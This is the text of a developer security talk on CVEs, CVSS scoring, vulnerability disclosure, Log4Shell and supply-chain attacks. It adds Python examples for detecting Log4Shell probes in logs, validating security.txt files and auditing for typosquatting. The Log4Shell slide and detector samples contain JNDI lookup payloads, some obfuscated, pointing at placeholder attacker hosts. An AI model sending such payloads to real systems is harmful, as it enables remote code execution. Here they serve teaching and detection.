BNYMellon - CVE 101.pdf
A DEVELOPER'S GUIDE TO THE
WORLD OF APPLICATION SECURITY
CVE 101
Theresa Mammarella
THERESA MAMMARELLA
• Software Engineer @ IBM
• Eclipse OpenJ9 JVM
• Open source developer, community
member, and speaker
@t_mammarella
linkedin.com/in/tmammarella
$8 TRILLION
In 2023, the global annual cost of cybercrime is predicted to top $8 trillion.
Source: Security Intelligence
IF CYBERCRIME WAS A COUNTRY (BY GDP)
United States: $20.89 Tr.
China: $14.72 Tr.
Cybercrime: $8.0 Tr.
Japan: $5.06 Tr.
Germany: $3.85 Tr.
United Kingdom: $2.67 Tr.
India: $2.66 Tr.
France: $2.63 Tr.
Italy: $1.89 Tr.
Canada: $1.64 Tr.
Source: globalpeoservices.com/top-15-countries-by-gdp-in-2022
INSIDER THREAT
The potential for an insider to use their authorized access or understanding of an organization to harm that organization
• When an engineer is compromised by outside influence or dissatisfaction
• When an engineer is poorly trained
• When engineers put backdoors into a product
• When remote development systems are not secured or when protections are
removed
• When accounts and credentials for terminated or inactive personnel remain
available.
Source: media.defense.gov/2022/Sep/01/2003068942/-1/-1/0/ESF_SECURING_THE_SOFTWARE_SUPPLY_CHAIN_DEVELOPERS.PDF
OUTNUMBERED SECURITY STAFF LEAVES SOFTWARE VULNERABLE
[Chart: AppSec staff vs. Developers]
ECONOMICS OF FIXING A SECURITY CONCERN
[Chart: cost of fix (y-axis) against time (x-axis)]
Source: testbytes.net/blog/what-is-a-software-bug
AGENDA
1 SECURITY BASICS
2 VULNERABILITY TRACKING
3 DISCLOSURE PROCESS
4 SECURITY PRACTICES FOR DEVELOPERS
THE BASICS
Vulnerability: a weakness in a system that could be exploited.
Threat: an actor or event with the potential to exploit it.
Risk: what you get when the two meet.
Vulnerability x Threat = Risk
COMMON VULNERABILITIES AND EXPOSURES (CVE)
Each record carries an ID (CVE-<year>-<sequence number>), a Description, and References.
NATIONAL VULNERABILITY DATABASE
CVSS SCORE METRICS
SCORING CONTEXT MATTERS
CVE-2023-36844 (CVSS 5.3) + CVE-2023-36845 (CVSS 5.3) + CVE-2023-36846 (CVSS 5.3) + CVE-2023-36847 (CVSS 5.3) = CVSS 9.8 (Critical)
Four Medium issues that can be chained are one Critical issue: a base score describes a single vulnerability in isolation, not what an attacker gets by combining it with others.
SO WHAT IS THE BEST WAY TO TALK ABOUT VULNERABILITIES?
• Private disclosure
• Coordinated (responsible) disclosure
• Full (public) disclosure
ZERO DAY VULNERABILITY
A security bug or flaw that is either unknown to the vendor or does not yet have an official patch.
The Zero Day Window is Closing
[Chart: average days from public disclosure to exploit, by year reported, 2006 to 2015; averages annotated at 45 and 15 days; later annotations mark 2017, 2019 and 2021, with Struts2 called out]
Source: Adapted from IBM X-Force / Analysis by Gartner Research (September 2016)
LOG4J
LOG4SHELL AND REMOTE CODE EXECUTION
logger.info("{}", "${jndi:ldap://evil.badguys}"); // attacker-controlled value reaching the logger
[Diagram: System Loader, JNDI Loader, http://badserver.com]
CVE-2021-44228 (AKA LOG4SHELL)
• Coordinated disclosure
• Incomplete fix
• More CVEs follow
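What a responder needs the day an issue like this lands is a way to find the probes in existing logs, so here is an added example, not code from the slides or from the Log4j project: vulnerable Log4j 2 versions resolved `${...}` lookups inside logged messages, which is why a `${jndi:ldap://...}` string in a header or query parameter reached the JNDI loader. Scanners quickly moved to nested lookups such as `${${lower:j}ndi:...}` and `${${::-j}${::-n}${::-d}${::-i}:...}` to defeat naive grep rules, so this detector first collapses those lookups the way Log4j would, then matches the normalized text. The log lines are constructed; the `lower`, `upper` and `:-` default handling are the only lookup behaviours it emulates.

```python
import re

# Innermost ${...} with no nested braces; evasion layers are peeled from the inside out.
INNER = re.compile(r"\$\{([^{}]*)\}")
# The payload shape once evasions are undone: a JNDI lookup naming a remote-capable scheme.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE)


def _resolve(content: str):
    """Text a Log4j-style lookup would produce for one ${...}, or None if it is not an evasion we undo."""
    low = content.lower()
    if low.startswith("jndi:"):
        return None                          # the payload itself; leave it for the detector
    if low.startswith("lower:"):
        return content[len("lower:"):].lower()
    if low.startswith("upper:"):
        return content[len("upper:"):].upper()
    if ":-" in content:                      # ${env:NaN:-j} and ${::-j} both evaluate to the default "j"
        return content.split(":-", 1)[1]
    return None


def normalize(text: str) -> str:
    """Collapse innermost evasion lookups repeatedly until nothing changes."""
    while True:
        changed = False

        def replace(m):
            nonlocal changed
            resolved = _resolve(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = INNER.sub(replace, text)
        if not changed:
            return text


def is_jndi_probe(line: str) -> bool:
    """True when the line carries a JNDI lookup, directly or behind nested-lookup obfuscation."""
    return JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (line number, normalized line) for every line that looks like a Log4Shell probe."""
    return [(n, normalize(line)) for n, line in enumerate(lines, 1) if is_jndi_probe(line)]


# Constructed access-log lines; the addresses, hostnames and paths are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:00:02 +0000] "GET /?x=${jndi:ldap://evil.badguys/a} HTTP/1.1" 200 "-"',
    '10.0.0.9 - - [10/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://evil.badguys/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:ldap://evil.badguys/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:05 +0000] "GET / HTTP/1.1" 200 "${${env:NaN:-j}ndi:rmi://evil.badguys/a}"',
    '10.0.0.7 - - [10/Dec/2021:10:00:06 +0000] "GET /search?q=${price} HTTP/1.1" 200 "-"',
]

if __name__ == "__main__":
    for n, line in scan(SAMPLE_LOG):
        print(f"line {n}: {line}")
```

A hit tells you someone probed; it does not tell you whether the lookup fired. Pair it with egress records (LDAP or RMI connections from application hosts to unfamiliar destinations) and treat upgrading Log4j as the fix, since a detector only shortens the time to notice.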
WHAT'S THE DIFFERENCE BETWEEN THESE LINES OF CODE?
CVE-2022-3786 AND CVE-2022-3602 (the two OpenSSL 3.0 punycode-decoding buffer overflows, fixed together in OpenSSL 3.0.7)
MOST OF THESE STORIES ARE UNTOLD
Jeremy Long, founder of the OWASP Dependency Check project, speculates that "only 25% of organizations report vulnerabilities to users, and only 10% of vulnerabilities are reported as Common Vulnerabilities and Exposures (CVE)."
Sonatype State of the Software Supply Chain Report 2019
Security Practices for
Developers
HOW DO I DISCLOSE A VULNERABILITY IN A RESPONSIBLE WAY?
• Company website
• security.txt on servers (/.well-known/security.txt, RFC 9116)
• SECURITY.md
• GitHub private vulnerability reporting
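On the receiving side, the file a researcher reads first is the one on your server, so here is an added example (not from the slides): a small parser and checker for security.txt as defined in RFC 9116. It enforces what the RFC requires (at least one Contact, exactly one Expires) and what it recommends (Contact values are mailto:, https:// or tel: URIs; Expires is not in the past and not more than a year away), and reports the mistakes that quietly make a file useless. Both sample files are constructed, and the fixed clock is there so the check is reproducible.

```python
import datetime as dt
import re

REQUIRED = {"Contact", "Expires"}
AT_MOST_ONCE = {"Expires", "Preferred-Languages"}
KNOWN = {"Acknowledgments", "Canonical", "Contact", "Encryption", "Expires",
         "Hiring", "Policy", "Preferred-Languages"}
CONTACT_URI = re.compile(r"^(mailto:|https://|tel:)", re.IGNORECASE)


def parse_security_txt(text: str) -> dict:
    """Field name -> list of values; blank lines and '#' comments are skipped."""
    fields = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if ":" not in line:
            raise ValueError(f"malformed line: {raw!r}")
        name, value = line.split(":", 1)
        fields.setdefault(name.strip(), []).append(value.strip())
    return fields


def _parse_expires(value: str) -> dt.datetime:
    # RFC 9116 uses the "2021-12-31T18:37:07z" form; fromisoformat needs "+00:00" before Python 3.11.
    when = dt.datetime.fromisoformat(value.strip().replace("z", "Z").replace("Z", "+00:00"))
    return when if when.tzinfo else when.replace(tzinfo=dt.timezone.utc)


def check(text: str, now: dt.datetime) -> list:
    """Findings a researcher-facing security.txt should not have; an empty list means it passes."""
    findings = []
    fields = parse_security_txt(text)
    for name in sorted(REQUIRED - fields.keys()):
        findings.append(f"missing required field {name}")
    for name in sorted(AT_MOST_ONCE):
        if len(fields.get(name, [])) > 1:
            findings.append(f"{name} must appear at most once")
    for name in sorted(fields.keys() - KNOWN):
        findings.append(f"unknown field {name}")
    for value in fields.get("Contact", []):
        if not CONTACT_URI.match(value):
            findings.append(f"Contact must be a mailto:, https:// or tel: URI, got {value!r}")
    for value in fields.get("Expires", [])[:1]:
        try:
            expires = _parse_expires(value)
        except ValueError:
            findings.append(f"Expires is not an ISO 8601 timestamp: {value!r}")
            continue
        if expires <= now:
            findings.append("file has expired; RFC 9116 says a stale file should not be used")
        elif expires > now + dt.timedelta(days=365):
            findings.append("Expires is more than a year out; RFC 9116 recommends less")
    return findings


NOW = dt.datetime(2024, 1, 15, tzinfo=dt.timezone.utc)  # fixed clock for a reproducible check

# Constructed: what example.com would serve at /.well-known/security.txt
GOOD = """\
# Constructed security.txt for example.com
Contact: mailto:security@example.com
Contact: https://example.com/security/report
Expires: 2024-12-31T23:59:59z
Encryption: https://example.com/pgp-key.txt
Policy: https://example.com/security-policy
Canonical: https://example.com/.well-known/security.txt
Preferred-Languages: en
"""

# Constructed: the two most common mistakes, a bare address and a date that already passed
BAD = """\
Contact: security@example.com
Expires: 2023-06-30T00:00:00z
"""

if __name__ == "__main__":
    print("good:", check(GOOD, NOW))
    print("bad:", check(BAD, NOW))
```

Run it against your own file on a schedule: an Expires that silently passes is the most common way a working disclosure channel turns into one researchers are told to ignore.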
THE MANTRA
Credit: Eddie Knight, Sonatype
01 Does this touch the internet?
If a feature touches the internet, we need to ensure end-to-end security from the supplier to the consumer.
02 Does this take untrusted input?
If a feature takes untrusted input, we need to validate its integrity before use.
03 Does this handle sensitive data?
If a feature handles sensitive data, we must take special care with encryption, handling, and storage.
SOFTWARE DEPENDENCIES
[Diagram: Dependencies, Dev Tools, Applications]
TYPES OF SUPPLY CHAIN ATTACKS
• Typosquatting (org.leftpad vs org.leftpadd)
• Open source repo attacks
• Build tool attacks
• Dependency confusion (foo @ v1 on the internal index vs foo @ v99999 on the public registry)
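The two attacks the slide illustrates by example can both be checked before a build pulls anything, so here is an added example that is not from the slides: a pre-install audit that flags requested package names within one edit (including a swapped pair of letters) of a well-known name, and internal package names that also exist on the public registry at a higher version, which is exactly the foo @ v1 vs foo @ v99999 situation a resolver merging two indexes falls for. The allow-list and both registry snapshots are constructed; a real run would pull them from your private index and the public registry's API.

```python
# Constructed allow-list of well-known package names; a real check would use registry download counts.
POPULAR = {"org.leftpad", "requests", "lodash", "urllib3", "express"}

# Constructed registry snapshots: versions the private index serves vs. what the public index claims.
PRIVATE_INDEX = {"foo": ["1.0.0", "1.2.0"], "acme-auth": ["3.1.0"]}
PUBLIC_INDEX = {"foo": ["99999.0.0"], "requests": ["2.31.0"], "lodash": ["4.17.21"]}


def edit_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute or swap two adjacent characters, each cost 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition, e.g. "reqeusts"
    return d[len(a)][len(b)]


def typosquat_candidates(name: str, known=POPULAR, max_distance: int = 1) -> list:
    """Well-known names within max_distance edits of `name`; an exact match is not a squat."""
    name = name.lower()
    if name in known:
        return []
    return sorted(k for k in known if edit_distance(name, k) <= max_distance)


def parse_version(v: str) -> tuple:
    return tuple(int(part) for part in v.split("."))


def dependency_confusion_risks(private=PRIVATE_INDEX, public=PUBLIC_INDEX) -> dict:
    """Internal names that also exist publicly at a higher version.

    A resolver that merges both indexes and takes the highest version fetches the attacker's package.
    """
    risks = {}
    for name, versions in private.items():
        public_versions = public.get(name, [])
        if public_versions and max(map(parse_version, public_versions)) > max(map(parse_version, versions)):
            risks[name] = max(public_versions, key=parse_version)
    return risks


def audit(requested, known=POPULAR, private=PRIVATE_INDEX, public=PUBLIC_INDEX) -> dict:
    """Findings for a list of requested package names, keyed by name."""
    findings = {}
    confusion = dependency_confusion_risks(private, public)
    for name in requested:
        near = typosquat_candidates(name, known)
        if near:
            findings[name] = f"possible typosquat of {near[0]}"
        elif name in confusion:
            findings[name] = f"public registry shadows internal package at version {confusion[name]}"
    return findings


if __name__ == "__main__":
    for name, finding in audit(["org.leftpadd", "requests", "foo", "reqeusts"]).items():
        print(f"{name}: {finding}")
```

The audit is a tripwire, not the fix. The fix for confusion is to point the resolver at a single index that proxies the public one and owns your internal namespace (and to register your internal names publicly so nobody else can); the fix for typosquats is a lockfile with pinned versions and hashes, reviewed whenever a new name enters it.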
HOW FAST IS YOUR RELEASE PROCESS?
Sonatype: State of the Software Supply Chain 2022
SECURITY CHAMPION
RECAP
• Vulnerability x Threat = Risk
• CVEs, CVSS, disclosure process
• The Mantra / OWASP Top 10
• Dependency management
• Release speed
• Security champion programs
THANK YOU BNY MELLON!
• Linux Foundation free course, Developing Secure Software: https://training.linuxfoundation.org/training/developing-secure-software-lfd121/
• OWASP WebGoat, hands on with the OWASP Top 10: https://owasp.org/www-project-webgoat/
• Foojay security posts: https://foojay.io/today/category/security/
• OWASP's list of Free for Open Source Application Security Tools: https://owasp.org/www-community/Free_for_Open_Source_Application_Security_Tools
KEEP IN TOUCH / Presentation Slides:
@t_mammarella
linkedin.com/in/tmammarella
